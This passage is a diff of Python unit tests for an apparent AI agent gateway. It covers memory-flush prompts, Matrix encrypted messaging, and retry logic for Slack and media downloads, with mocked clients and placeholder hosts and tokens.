||||
fake.load_dotenv = lambda *a, **kw: None
|
||||
monkeypatch.setitem(sys.modules, "dotenv", fake)
|
||||
|
||||
|
||||
def _make_runner():
|
||||
from gateway.run import GatewayRunner
|
||||
|
||||
@@ -67,151 +57,105 @@ class TestCronSessionBypass:
|
||||
runner.session_store.load_transcript.assert_called_once_with("session_abc123")
|
||||
|
||||
|
||||
def _make_flush_context(monkeypatch, memory_dir=None):
|
||||
"""Return (runner, tmp_agent, fake_run_agent) with run_agent mocked in sys.modules."""
|
||||
tmp_agent = MagicMock()
|
||||
fake_run_agent = types.ModuleType("run_agent")
|
||||
fake_run_agent.AIAgent = MagicMock(return_value=tmp_agent)
|
||||
monkeypatch.setitem(sys.modules, "run_agent", fake_run_agent)
|
||||
|
||||
runner = _make_runner()
|
||||
runner.session_store.load_transcript.return_value = _TRANSCRIPT_4_MSGS
|
||||
return runner, tmp_agent, memory_dir
|
||||
|
||||
|
||||
class TestMemoryInjection:
|
||||
"""The flush prompt should include current memory state from disk."""
|
||||
|
||||
def test_memory_content_injected_into_flush_prompt(self, tmp_path, monkeypatch):
|
||||
def test_memory_content_injected_into_flush_prompt(self, tmp_path):
|
||||
"""When memory files exist, their content appears in the flush prompt."""
|
||||
runner = _make_runner()
|
||||
runner.session_store.load_transcript.return_value = _TRANSCRIPT_4_MSGS
|
||||
|
||||
tmp_agent = MagicMock()
|
||||
memory_dir = tmp_path / "memories"
|
||||
memory_dir.mkdir()
|
||||
(memory_dir / "MEMORY.md").write_text("Agent knows Python\n§\nUser prefers dark mode")
|
||||
(memory_dir / "USER.md").write_text("Name: Alice\n§\nTimezone: PST")
|
||||
|
||||
runner, tmp_agent, _ = _make_flush_context(monkeypatch, memory_dir)
|
||||
|
||||
with (
|
||||
patch("gateway.run._resolve_runtime_agent_kwargs", return_value={"api_key": "k"}),
|
||||
patch("gateway.run._resolve_gateway_model", return_value="test-model"),
|
||||
patch("run_agent.AIAgent", return_value=tmp_agent),
|
||||
# Intercept `from tools.memory_tool import MEMORY_DIR` inside the function
|
||||
patch.dict("sys.modules", {"tools.memory_tool": MagicMock(MEMORY_DIR=memory_dir)}),
|
||||
):
|
||||
runner._flush_memories_for_session("session_123")
|
||||
|
||||
tmp_agent.run_conversation.assert_called_once()
|
||||
flush_prompt = tmp_agent.run_conversation.call_args.kwargs.get("user_message", "")
|
||||
|
||||
call_kwargs = tmp_agent.run_conversation.call_args.kwargs
|
||||
flush_prompt = call_kwargs.get("user_message", "")
|
||||
|
||||
# Verify both memory sections appear in the prompt
|
||||
assert "Agent knows Python" in flush_prompt
|
||||
assert "User prefers dark mode" in flush_prompt
|
||||
assert "Name: Alice" in flush_prompt
|
||||
assert "Timezone: PST" in flush_prompt
|
||||
# Verify the stale-overwrite warning is present
|
||||
assert "Do NOT overwrite or remove entries" in flush_prompt
|
||||
assert "current live state of memory" in flush_prompt
|
||||
|
||||
def test_flush_works_without_memory_files(self, tmp_path, monkeypatch):
|
||||
def test_flush_works_without_memory_files(self, tmp_path):
|
||||
"""When no memory files exist, flush still runs without the guard."""
|
||||
runner = _make_runner()
|
||||
runner.session_store.load_transcript.return_value = _TRANSCRIPT_4_MSGS
|
||||
|
||||
tmp_agent = MagicMock()
|
||||
empty_dir = tmp_path / "no_memories"
|
||||
empty_dir.mkdir()
|
||||
|
||||
runner, tmp_agent, _ = _make_flush_context(monkeypatch)
|
||||
|
||||
with (
|
||||
patch("gateway.run._resolve_runtime_agent_kwargs", return_value={"api_key": "k"}),
|
||||
patch("gateway.run._resolve_gateway_model", return_value="test-model"),
|
||||
patch("run_agent.AIAgent", return_value=tmp_agent),
|
||||
patch.dict("sys.modules", {"tools.memory_tool": MagicMock(MEMORY_DIR=empty_dir)}),
|
||||
):
|
||||
runner._flush_memories_for_session("session_456")
|
||||
|
||||
# Should still run, just without the memory guard section
|
||||
tmp_agent.run_conversation.assert_called_once()
|
||||
flush_prompt = tmp_agent.run_conversation.call_args.kwargs.get("user_message", "")
|
||||
assert "Do NOT overwrite or remove entries" not in flush_prompt
|
||||
assert "Review the conversation above" in flush_prompt
|
||||
|
||||
def test_empty_memory_files_no_injection(self, tmp_path, monkeypatch):
|
||||
def test_empty_memory_files_no_injection(self, tmp_path):
|
||||
"""Empty memory files should not trigger the guard section."""
|
||||
runner = _make_runner()
|
||||
runner.session_store.load_transcript.return_value = _TRANSCRIPT_4_MSGS
|
||||
|
||||
tmp_agent = MagicMock()
|
||||
memory_dir = tmp_path / "memories"
|
||||
memory_dir.mkdir()
|
||||
(memory_dir / "MEMORY.md").write_text("")
|
||||
(memory_dir / "USER.md").write_text(" \n ") # whitespace only
|
||||
|
||||
runner, tmp_agent, _ = _make_flush_context(monkeypatch)
|
||||
|
||||
with (
|
||||
patch("gateway.run._resolve_runtime_agent_kwargs", return_value={"api_key": "k"}),
|
||||
patch("gateway.run._resolve_gateway_model", return_value="test-model"),
|
||||
patch("run_agent.AIAgent", return_value=tmp_agent),
|
||||
patch.dict("sys.modules", {"tools.memory_tool": MagicMock(MEMORY_DIR=memory_dir)}),
|
||||
):
|
||||
runner._flush_memories_for_session("session_789")
|
||||
|
||||
tmp_agent.run_conversation.assert_called_once()
|
||||
flush_prompt = tmp_agent.run_conversation.call_args.kwargs.get("user_message", "")
|
||||
# No memory content → no guard section
|
||||
assert "current live state of memory" not in flush_prompt
|
||||
|
||||
|
||||
class TestFlushAgentSilenced:
|
||||
"""The flush agent must not produce any terminal output."""
|
||||
|
||||
def test_print_fn_set_to_noop(self, tmp_path, monkeypatch):
|
||||
"""_print_fn on the flush agent must be a no-op so tool output never leaks."""
|
||||
runner = _make_runner()
|
||||
runner.session_store.load_transcript.return_value = _TRANSCRIPT_4_MSGS
|
||||
|
||||
captured_agent = {}
|
||||
|
||||
def _fake_ai_agent(*args, **kwargs):
|
||||
agent = MagicMock()
|
||||
captured_agent["instance"] = agent
|
||||
return agent
|
||||
|
||||
fake_run_agent = types.ModuleType("run_agent")
|
||||
fake_run_agent.AIAgent = _fake_ai_agent
|
||||
monkeypatch.setitem(sys.modules, "run_agent", fake_run_agent)
|
||||
|
||||
with (
|
||||
patch("gateway.run._resolve_runtime_agent_kwargs", return_value={"api_key": "k"}),
|
||||
patch("gateway.run._resolve_gateway_model", return_value="test-model"),
|
||||
patch.dict("sys.modules", {"tools.memory_tool": MagicMock(MEMORY_DIR=tmp_path)}),
|
||||
):
|
||||
runner._flush_memories_for_session("session_silent")
|
||||
|
||||
agent = captured_agent["instance"]
|
||||
assert agent._print_fn is not None, "_print_fn should be overridden to suppress output"
|
||||
# Confirm it is callable and produces no output (no exception)
|
||||
agent._print_fn("should be silenced")
|
||||
|
||||
def test_kawaii_spinner_respects_print_fn(self):
|
||||
"""KawaiiSpinner must route all output through print_fn when supplied."""
|
||||
from agent.display import KawaiiSpinner
|
||||
|
||||
written = []
|
||||
spinner = KawaiiSpinner("test", print_fn=lambda *a, **kw: written.append(a))
|
||||
spinner._write("hello")
|
||||
assert written == [("hello",)], "spinner should route through print_fn"
|
||||
|
||||
# A no-op print_fn must produce no output to stdout
|
||||
import io, sys
|
||||
buf = io.StringIO()
|
||||
old_stdout = sys.stdout
|
||||
sys.stdout = buf
|
||||
try:
|
||||
silent_spinner = KawaiiSpinner("silent", print_fn=lambda *a, **kw: None)
|
||||
silent_spinner._write("should not appear")
|
||||
silent_spinner.stop("done")
|
||||
finally:
|
||||
sys.stdout = old_stdout
|
||||
assert buf.getvalue() == "", "no-op print_fn spinner must not write to stdout"
|
||||
|
||||
|
||||
class TestFlushPromptStructure:
|
||||
"""Verify the flush prompt retains its core instructions."""
|
||||
|
||||
def test_core_instructions_present(self, monkeypatch):
|
||||
def test_core_instructions_present(self):
|
||||
"""The flush prompt should still contain the original guidance."""
|
||||
runner, tmp_agent, _ = _make_flush_context(monkeypatch)
|
||||
runner = _make_runner()
|
||||
runner.session_store.load_transcript.return_value = _TRANSCRIPT_4_MSGS
|
||||
|
||||
tmp_agent = MagicMock()
|
||||
|
||||
with (
|
||||
patch("gateway.run._resolve_runtime_agent_kwargs", return_value={"api_key": "k"}),
|
||||
patch("gateway.run._resolve_gateway_model", return_value="test-model"),
|
||||
patch("run_agent.AIAgent", return_value=tmp_agent),
|
||||
# Make the import fail gracefully so we test without memory files
|
||||
patch.dict("sys.modules", {"tools.memory_tool": MagicMock(MEMORY_DIR=Path("/nonexistent"))}),
|
||||
):
|
||||
runner._flush_memories_for_session("session_struct")
|
||||
|
||||
@@ -1,5 +1,4 @@
|
||||
"""Tests for Matrix platform adapter."""
|
||||
import asyncio
|
||||
import json
|
||||
import re
|
||||
import pytest
|
||||
@@ -447,199 +446,3 @@ class TestMatrixRequirements:
|
||||
monkeypatch.delenv("MATRIX_HOMESERVER", raising=False)
|
||||
from gateway.platforms.matrix import check_matrix_requirements
|
||||
assert check_matrix_requirements() is False
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Access-token auth / E2EE bootstrap
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
class TestMatrixAccessTokenAuth:
|
||||
@pytest.mark.asyncio
|
||||
async def test_connect_fetches_device_id_from_whoami_for_access_token(self):
|
||||
from gateway.platforms.matrix import MatrixAdapter
|
||||
|
||||
config = PlatformConfig(
|
||||
enabled=True,
|
||||
token="syt_test_access_token",
|
||||
extra={
|
||||
"homeserver": "https://matrix.example.org",
|
||||
"user_id": "@bot:example.org",
|
||||
"encryption": True,
|
||||
},
|
||||
)
|
||||
adapter = MatrixAdapter(config)
|
||||
|
||||
class FakeWhoamiResponse:
|
||||
def __init__(self, user_id, device_id):
|
||||
self.user_id = user_id
|
||||
self.device_id = device_id
|
||||
|
||||
class FakeSyncResponse:
|
||||
def __init__(self):
|
||||
self.rooms = MagicMock(join={})
|
||||
|
||||
fake_client = MagicMock()
|
||||
fake_client.whoami = AsyncMock(return_value=FakeWhoamiResponse("@bot:example.org", "DEV123"))
|
||||
fake_client.sync = AsyncMock(return_value=FakeSyncResponse())
|
||||
fake_client.keys_upload = AsyncMock()
|
||||
fake_client.keys_query = AsyncMock()
|
||||
fake_client.keys_claim = AsyncMock()
|
||||
fake_client.send_to_device_messages = AsyncMock(return_value=[])
|
||||
fake_client.get_users_for_key_claiming = MagicMock(return_value={})
|
||||
fake_client.close = AsyncMock()
|
||||
fake_client.add_event_callback = MagicMock()
|
||||
fake_client.rooms = {}
|
||||
fake_client.account_data = {}
|
||||
fake_client.olm = object()
|
||||
fake_client.should_upload_keys = False
|
||||
fake_client.should_query_keys = False
|
||||
fake_client.should_claim_keys = False
|
||||
|
||||
def _restore_login(user_id, device_id, access_token):
|
||||
fake_client.user_id = user_id
|
||||
fake_client.device_id = device_id
|
||||
fake_client.access_token = access_token
|
||||
fake_client.olm = object()
|
||||
|
||||
fake_client.restore_login = MagicMock(side_effect=_restore_login)
|
||||
|
||||
fake_nio = MagicMock()
|
||||
fake_nio.AsyncClient = MagicMock(return_value=fake_client)
|
||||
fake_nio.WhoamiResponse = FakeWhoamiResponse
|
||||
fake_nio.SyncResponse = FakeSyncResponse
|
||||
fake_nio.LoginResponse = type("LoginResponse", (), {})
|
||||
fake_nio.RoomMessageText = type("RoomMessageText", (), {})
|
||||
fake_nio.RoomMessageImage = type("RoomMessageImage", (), {})
|
||||
fake_nio.RoomMessageAudio = type("RoomMessageAudio", (), {})
|
||||
fake_nio.RoomMessageVideo = type("RoomMessageVideo", (), {})
|
||||
fake_nio.RoomMessageFile = type("RoomMessageFile", (), {})
|
||||
fake_nio.InviteMemberEvent = type("InviteMemberEvent", (), {})
|
||||
fake_nio.MegolmEvent = type("MegolmEvent", (), {})
|
||||
|
||||
with patch.dict("sys.modules", {"nio": fake_nio}):
|
||||
with patch.object(adapter, "_refresh_dm_cache", AsyncMock()):
|
||||
with patch.object(adapter, "_sync_loop", AsyncMock(return_value=None)):
|
||||
assert await adapter.connect() is True
|
||||
|
||||
fake_client.restore_login.assert_called_once_with(
|
||||
"@bot:example.org", "DEV123", "syt_test_access_token"
|
||||
)
|
||||
assert fake_client.access_token == "syt_test_access_token"
|
||||
assert fake_client.user_id == "@bot:example.org"
|
||||
assert fake_client.device_id == "DEV123"
|
||||
fake_client.whoami.assert_awaited_once()
|
||||
|
||||
await adapter.disconnect()
|
||||
|
||||
|
||||
class TestMatrixE2EEMaintenance:
|
||||
@pytest.mark.asyncio
|
||||
async def test_sync_loop_runs_e2ee_maintenance_requests(self):
|
||||
adapter = _make_adapter()
|
||||
adapter._encryption = True
|
||||
adapter._closing = False
|
||||
|
||||
class FakeSyncError:
|
||||
pass
|
||||
|
||||
async def _sync_once(timeout=30000):
|
||||
adapter._closing = True
|
||||
return MagicMock()
|
||||
|
||||
fake_client = MagicMock()
|
||||
fake_client.sync = AsyncMock(side_effect=_sync_once)
|
||||
fake_client.send_to_device_messages = AsyncMock(return_value=[])
|
||||
fake_client.keys_upload = AsyncMock()
|
||||
fake_client.keys_query = AsyncMock()
|
||||
fake_client.get_users_for_key_claiming = MagicMock(
|
||||
return_value={"@alice:example.org": ["DEVICE1"]}
|
||||
)
|
||||
fake_client.keys_claim = AsyncMock()
|
||||
fake_client.olm = object()
|
||||
fake_client.should_upload_keys = True
|
||||
fake_client.should_query_keys = True
|
||||
fake_client.should_claim_keys = True
|
||||
|
||||
adapter._client = fake_client
|
||||
|
||||
fake_nio = MagicMock()
|
||||
fake_nio.SyncError = FakeSyncError
|
||||
|
||||
with patch.dict("sys.modules", {"nio": fake_nio}):
|
||||
await adapter._sync_loop()
|
||||
|
||||
fake_client.sync.assert_awaited_once_with(timeout=30000)
|
||||
fake_client.send_to_device_messages.assert_awaited_once()
|
||||
fake_client.keys_upload.assert_awaited_once()
|
||||
fake_client.keys_query.assert_awaited_once()
|
||||
fake_client.keys_claim.assert_awaited_once_with(
|
||||
{"@alice:example.org": ["DEVICE1"]}
|
||||
)
|
||||
|
||||
|
||||
class TestMatrixEncryptedSendFallback:
|
||||
@pytest.mark.asyncio
|
||||
async def test_send_retries_with_ignored_unverified_devices(self):
|
||||
adapter = _make_adapter()
|
||||
adapter._encryption = True
|
||||
|
||||
class FakeRoomSendResponse:
|
||||
def __init__(self, event_id):
|
||||
self.event_id = event_id
|
||||
|
||||
class FakeOlmUnverifiedDeviceError(Exception):
|
||||
pass
|
||||
|
||||
fake_client = MagicMock()
|
||||
fake_client.room_send = AsyncMock(side_effect=[
|
||||
FakeOlmUnverifiedDeviceError("unverified"),
|
||||
FakeRoomSendResponse("$event123"),
|
||||
])
|
||||
adapter._client = fake_client
|
||||
adapter._run_e2ee_maintenance = AsyncMock()
|
||||
|
||||
fake_nio = MagicMock()
|
||||
fake_nio.RoomSendResponse = FakeRoomSendResponse
|
||||
fake_nio.OlmUnverifiedDeviceError = FakeOlmUnverifiedDeviceError
|
||||
|
||||
with patch.dict("sys.modules", {"nio": fake_nio}):
|
||||
result = await adapter.send("!room:example.org", "hello")
|
||||
|
||||
assert result.success is True
|
||||
assert result.message_id == "$event123"
|
||||
adapter._run_e2ee_maintenance.assert_awaited_once()
|
||||
assert fake_client.room_send.await_count == 2
|
||||
first_call = fake_client.room_send.await_args_list[0]
|
||||
second_call = fake_client.room_send.await_args_list[1]
|
||||
assert first_call.kwargs.get("ignore_unverified_devices") is False
|
||||
assert second_call.kwargs.get("ignore_unverified_devices") is True
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_send_retries_after_timeout_in_encrypted_room(self):
|
||||
adapter = _make_adapter()
|
||||
adapter._encryption = True
|
||||
|
||||
class FakeRoomSendResponse:
|
||||
def __init__(self, event_id):
|
||||
self.event_id = event_id
|
||||
|
||||
fake_client = MagicMock()
|
||||
fake_client.room_send = AsyncMock(side_effect=[
|
||||
asyncio.TimeoutError(),
|
||||
FakeRoomSendResponse("$event456"),
|
||||
])
|
||||
adapter._client = fake_client
|
||||
adapter._run_e2ee_maintenance = AsyncMock()
|
||||
|
||||
fake_nio = MagicMock()
|
||||
fake_nio.RoomSendResponse = FakeRoomSendResponse
|
||||
|
||||
with patch.dict("sys.modules", {"nio": fake_nio}):
|
||||
result = await adapter.send("!room:example.org", "hello")
|
||||
|
||||
assert result.success is True
|
||||
assert result.message_id == "$event456"
|
||||
adapter._run_e2ee_maintenance.assert_awaited_once()
|
||||
assert fake_client.room_send.await_count == 2
|
||||
second_call = fake_client.room_send.await_args_list[1]
|
||||
assert second_call.kwargs.get("ignore_unverified_devices") is True
|
||||
|
||||
@@ -1,558 +0,0 @@
|
||||
"""
|
||||
Tests for media download retry logic added in PR #2982.
|
||||
|
||||
Covers:
|
||||
- gateway/platforms/base.py: cache_image_from_url
|
||||
- gateway/platforms/slack.py: SlackAdapter._download_slack_file
|
||||
SlackAdapter._download_slack_file_bytes
|
||||
- gateway/platforms/mattermost.py: MattermostAdapter._send_url_as_file
|
||||
|
||||
All async tests use asyncio.run() directly — pytest-asyncio is not installed
|
||||
in this environment.
|
||||
"""
|
||||
|
||||
import asyncio
|
||||
import sys
|
||||
from unittest.mock import AsyncMock, MagicMock, patch
|
||||
|
||||
import pytest
|
||||
import httpx
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Helpers for building httpx exceptions
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
def _make_http_status_error(status_code: int) -> httpx.HTTPStatusError:
|
||||
request = httpx.Request("GET", "http://example.com/img.jpg")
|
||||
response = httpx.Response(status_code=status_code, request=request)
|
||||
return httpx.HTTPStatusError(
|
||||
f"HTTP {status_code}", request=request, response=response
|
||||
)
|
||||
|
||||
|
||||
def _make_timeout_error() -> httpx.TimeoutException:
|
||||
return httpx.TimeoutException("timed out")
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# cache_image_from_url (base.py)
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
class TestCacheImageFromUrl:
|
||||
"""Tests for gateway.platforms.base.cache_image_from_url"""
|
||||
|
||||
def test_success_on_first_attempt(self, tmp_path, monkeypatch):
|
||||
"""A clean 200 response caches the image and returns a path."""
|
||||
monkeypatch.setattr("gateway.platforms.base.IMAGE_CACHE_DIR", tmp_path / "img")
|
||||
|
||||
fake_response = MagicMock()
|
||||
fake_response.content = b"\xff\xd8\xff fake jpeg"
|
||||
fake_response.raise_for_status = MagicMock()
|
||||
|
||||
mock_client = AsyncMock()
|
||||
mock_client.get = AsyncMock(return_value=fake_response)
|
||||
mock_client.__aenter__ = AsyncMock(return_value=mock_client)
|
||||
mock_client.__aexit__ = AsyncMock(return_value=False)
|
||||
|
||||
async def run():
|
||||
with patch("httpx.AsyncClient", return_value=mock_client):
|
||||
from gateway.platforms.base import cache_image_from_url
|
||||
return await cache_image_from_url(
|
||||
"http://example.com/img.jpg", ext=".jpg"
|
||||
)
|
||||
|
||||
path = asyncio.run(run())
|
||||
assert path.endswith(".jpg")
|
||||
mock_client.get.assert_called_once()
|
||||
|
||||
def test_retries_on_timeout_then_succeeds(self, tmp_path, monkeypatch):
|
||||
"""A timeout on the first attempt is retried; second attempt succeeds."""
|
||||
monkeypatch.setattr("gateway.platforms.base.IMAGE_CACHE_DIR", tmp_path / "img")
|
||||
|
||||
fake_response = MagicMock()
|
||||
fake_response.content = b"image data"
|
||||
fake_response.raise_for_status = MagicMock()
|
||||
|
||||
mock_client = AsyncMock()
|
||||
mock_client.get = AsyncMock(
|
||||
side_effect=[_make_timeout_error(), fake_response]
|
||||
)
|
||||
mock_client.__aenter__ = AsyncMock(return_value=mock_client)
|
||||
mock_client.__aexit__ = AsyncMock(return_value=False)
|
||||
|
||||
mock_sleep = AsyncMock()
|
||||
|
||||
async def run():
|
||||
with patch("httpx.AsyncClient", return_value=mock_client), \
|
||||
patch("asyncio.sleep", mock_sleep):
|
||||
from gateway.platforms.base import cache_image_from_url
|
||||
return await cache_image_from_url(
|
||||
"http://example.com/img.jpg", ext=".jpg", retries=2
|
||||
)
|
||||
|
||||
path = asyncio.run(run())
|
||||
assert path.endswith(".jpg")
|
||||
assert mock_client.get.call_count == 2
|
||||
mock_sleep.assert_called_once()
|
||||
|
||||
def test_retries_on_429_then_succeeds(self, tmp_path, monkeypatch):
|
||||
"""A 429 response on the first attempt is retried; second attempt succeeds."""
|
||||
monkeypatch.setattr("gateway.platforms.base.IMAGE_CACHE_DIR", tmp_path / "img")
|
||||
|
||||
ok_response = MagicMock()
|
||||
ok_response.content = b"image data"
|
||||
ok_response.raise_for_status = MagicMock()
|
||||
|
||||
mock_client = AsyncMock()
|
||||
mock_client.get = AsyncMock(
|
||||
side_effect=[_make_http_status_error(429), ok_response]
|
||||
)
|
||||
mock_client.__aenter__ = AsyncMock(return_value=mock_client)
|
||||
mock_client.__aexit__ = AsyncMock(return_value=False)
|
||||
|
||||
async def run():
|
||||
with patch("httpx.AsyncClient", return_value=mock_client), \
|
||||
patch("asyncio.sleep", new_callable=AsyncMock):
|
||||
from gateway.platforms.base import cache_image_from_url
|
||||
return await cache_image_from_url(
|
||||
"http://example.com/img.jpg", ext=".jpg", retries=2
|
||||
)
|
||||
|
||||
path = asyncio.run(run())
|
||||
assert path.endswith(".jpg")
|
||||
assert mock_client.get.call_count == 2
|
||||
|
||||
def test_raises_after_max_retries_exhausted(self, tmp_path, monkeypatch):
|
||||
"""Timeout on every attempt raises after all retries are consumed."""
|
||||
monkeypatch.setattr("gateway.platforms.base.IMAGE_CACHE_DIR", tmp_path / "img")
|
||||
|
||||
mock_client = AsyncMock()
|
||||
mock_client.get = AsyncMock(side_effect=_make_timeout_error())
|
||||
mock_client.__aenter__ = AsyncMock(return_value=mock_client)
|
||||
mock_client.__aexit__ = AsyncMock(return_value=False)
|
||||
|
||||
async def run():
|
||||
with patch("httpx.AsyncClient", return_value=mock_client), \
|
||||
patch("asyncio.sleep", new_callable=AsyncMock):
|
||||
from gateway.platforms.base import cache_image_from_url
|
||||
await cache_image_from_url(
|
||||
"http://example.com/img.jpg", ext=".jpg", retries=2
|
||||
)
|
||||
|
||||
with pytest.raises(httpx.TimeoutException):
|
||||
asyncio.run(run())
|
||||
|
||||
# 3 total calls: initial + 2 retries
|
||||
assert mock_client.get.call_count == 3
|
||||
|
||||
def test_non_retryable_4xx_raises_immediately(self, tmp_path, monkeypatch):
|
||||
"""A 404 (non-retryable) is raised immediately without any retry."""
|
||||
monkeypatch.setattr("gateway.platforms.base.IMAGE_CACHE_DIR", tmp_path / "img")
|
||||
|
||||
mock_sleep = AsyncMock()
|
||||
mock_client = AsyncMock()
|
||||
mock_client.get = AsyncMock(side_effect=_make_http_status_error(404))
|
||||
mock_client.__aenter__ = AsyncMock(return_value=mock_client)
|
||||
mock_client.__aexit__ = AsyncMock(return_value=False)
|
||||
|
||||
async def run():
|
||||
with patch("httpx.AsyncClient", return_value=mock_client), \
|
||||
patch("asyncio.sleep", mock_sleep):
|
||||
from gateway.platforms.base import cache_image_from_url
|
||||
await cache_image_from_url(
|
||||
"http://example.com/img.jpg", ext=".jpg", retries=2
|
||||
)
|
||||
|
||||
with pytest.raises(httpx.HTTPStatusError):
|
||||
asyncio.run(run())
|
||||
|
||||
# Only 1 attempt, no sleep
|
||||
assert mock_client.get.call_count == 1
|
||||
mock_sleep.assert_not_called()
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Slack mock setup (mirrors existing test_slack.py approach)
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
def _ensure_slack_mock():
|
||||
if "slack_bolt" in sys.modules and hasattr(sys.modules["slack_bolt"], "__file__"):
|
||||
return
|
||||
slack_bolt = MagicMock()
|
||||
slack_bolt.async_app.AsyncApp = MagicMock
|
||||
slack_bolt.adapter.socket_mode.async_handler.AsyncSocketModeHandler = MagicMock
|
||||
slack_sdk = MagicMock()
|
||||
slack_sdk.web.async_client.AsyncWebClient = MagicMock
|
||||
for name, mod in [
|
||||
("slack_bolt", slack_bolt),
|
||||
("slack_bolt.async_app", slack_bolt.async_app),
|
||||
("slack_bolt.adapter", slack_bolt.adapter),
|
||||
("slack_bolt.adapter.socket_mode", slack_bolt.adapter.socket_mode),
|
||||
("slack_bolt.adapter.socket_mode.async_handler",
|
||||
slack_bolt.adapter.socket_mode.async_handler),
|
||||
("slack_sdk", slack_sdk),
|
||||
("slack_sdk.web", slack_sdk.web),
|
||||
("slack_sdk.web.async_client", slack_sdk.web.async_client),
|
||||
]:
|
||||
sys.modules.setdefault(name, mod)
|
||||
|
||||
|
||||
_ensure_slack_mock()
|
||||
|
||||
import gateway.platforms.slack as _slack_mod # noqa: E402
|
||||
_slack_mod.SLACK_AVAILABLE = True
|
||||
|
||||
from gateway.platforms.slack import SlackAdapter # noqa: E402
|
||||
from gateway.config import Platform, PlatformConfig # noqa: E402
|
||||
|
||||
|
||||
def _make_slack_adapter():
|
||||
config = PlatformConfig(enabled=True, token="xoxb-fake-token")
|
||||
adapter = SlackAdapter(config)
|
||||
adapter._app = MagicMock()
|
||||
adapter._app.client = AsyncMock()
|
||||
adapter._bot_user_id = "U_BOT"
|
||||
adapter._running = True
|
||||
return adapter
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# SlackAdapter._download_slack_file
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
class TestSlackDownloadSlackFile:
|
||||
"""Tests for SlackAdapter._download_slack_file"""
|
||||
|
||||
def test_success_on_first_attempt(self, tmp_path, monkeypatch):
|
||||
"""Successful download on first try returns a cached file path."""
|
||||
monkeypatch.setattr("gateway.platforms.base.IMAGE_CACHE_DIR", tmp_path / "img")
|
||||
adapter = _make_slack_adapter()
|
||||
|
||||
fake_response = MagicMock()
|
||||
fake_response.content = b"fake image bytes"
|
||||
fake_response.raise_for_status = MagicMock()
|
||||
|
||||
mock_client = AsyncMock()
|
||||
mock_client.get = AsyncMock(return_value=fake_response)
|
||||
mock_client.__aenter__ = AsyncMock(return_value=mock_client)
|
||||
mock_client.__aexit__ = AsyncMock(return_value=False)
|
||||
|
||||
async def run():
|
||||
with patch("httpx.AsyncClient", return_value=mock_client):
|
||||
return await adapter._download_slack_file(
|
||||
"https://files.slack.com/img.jpg", ext=".jpg"
|
||||
)
|
||||
|
||||
path = asyncio.run(run())
|
||||
assert path.endswith(".jpg")
|
||||
mock_client.get.assert_called_once()
|
||||
|
||||
def test_retries_on_timeout_then_succeeds(self, tmp_path, monkeypatch):
|
||||
"""Timeout on first attempt triggers retry; success on second."""
|
||||
monkeypatch.setattr("gateway.platforms.base.IMAGE_CACHE_DIR", tmp_path / "img")
|
||||
adapter = _make_slack_adapter()
|
||||
|
||||
fake_response = MagicMock()
|
||||
fake_response.content = b"image bytes"
|
||||
fake_response.raise_for_status = MagicMock()
|
||||
|
||||
mock_client = AsyncMock()
|
||||
mock_client.get = AsyncMock(
|
||||
side_effect=[_make_timeout_error(), fake_response]
|
||||
)
|
||||
mock_client.__aenter__ = AsyncMock(return_value=mock_client)
|
||||
mock_client.__aexit__ = AsyncMock(return_value=False)
|
||||
|
||||
mock_sleep = AsyncMock()
|
||||
|
||||
async def run():
|
||||
with patch("httpx.AsyncClient", return_value=mock_client), \
|
||||
patch("asyncio.sleep", mock_sleep):
|
||||
return await adapter._download_slack_file(
|
||||
"https://files.slack.com/img.jpg", ext=".jpg"
|
||||
)
|
||||
|
||||
path = asyncio.run(run())
|
||||
assert path.endswith(".jpg")
|
||||
assert mock_client.get.call_count == 2
|
||||
mock_sleep.assert_called_once()
|
||||
|
||||
def test_raises_after_max_retries(self, tmp_path, monkeypatch):
|
||||
"""Timeout on every attempt eventually raises after 3 total tries."""
|
||||
monkeypatch.setattr("gateway.platforms.base.IMAGE_CACHE_DIR", tmp_path / "img")
|
||||
adapter = _make_slack_adapter()
|
||||
|
||||
mock_client = AsyncMock()
|
||||
mock_client.get = AsyncMock(side_effect=_make_timeout_error())
|
||||
mock_client.__aenter__ = AsyncMock(return_value=mock_client)
|
||||
mock_client.__aexit__ = AsyncMock(return_value=False)
|
||||
|
||||
async def run():
|
||||
with patch("httpx.AsyncClient", return_value=mock_client), \
|
||||
patch("asyncio.sleep", new_callable=AsyncMock):
|
||||
await adapter._download_slack_file(
|
||||
"https://files.slack.com/img.jpg", ext=".jpg"
|
||||
)
|
||||
|
||||
with pytest.raises(httpx.TimeoutException):
|
||||
asyncio.run(run())
|
||||
|
||||
assert mock_client.get.call_count == 3
|
||||
|
||||
def test_non_retryable_403_raises_immediately(self, tmp_path, monkeypatch):
|
||||
"""A 403 is not retried; it raises immediately."""
|
||||
monkeypatch.setattr("gateway.platforms.base.IMAGE_CACHE_DIR", tmp_path / "img")
|
||||
adapter = _make_slack_adapter()
|
||||
|
||||
mock_sleep = AsyncMock()
|
||||
mock_client = AsyncMock()
|
||||
mock_client.get = AsyncMock(side_effect=_make_http_status_error(403))
|
||||
mock_client.__aenter__ = AsyncMock(return_value=mock_client)
|
||||
mock_client.__aexit__ = AsyncMock(return_value=False)
|
||||
|
||||
async def run():
|
||||
with patch("httpx.AsyncClient", return_value=mock_client), \
|
||||
patch("asyncio.sleep", mock_sleep):
|
||||
await adapter._download_slack_file(
|
||||
"https://files.slack.com/img.jpg", ext=".jpg"
|
||||
)
|
||||
|
||||
with pytest.raises(httpx.HTTPStatusError):
|
||||
asyncio.run(run())
|
||||
|
||||
assert mock_client.get.call_count == 1
|
||||
mock_sleep.assert_not_called()
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# SlackAdapter._download_slack_file_bytes
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
class TestSlackDownloadSlackFileBytes:
|
||||
"""Tests for SlackAdapter._download_slack_file_bytes"""
|
||||
|
||||
def test_success_returns_bytes(self):
|
||||
"""Successful download returns raw bytes."""
|
||||
adapter = _make_slack_adapter()
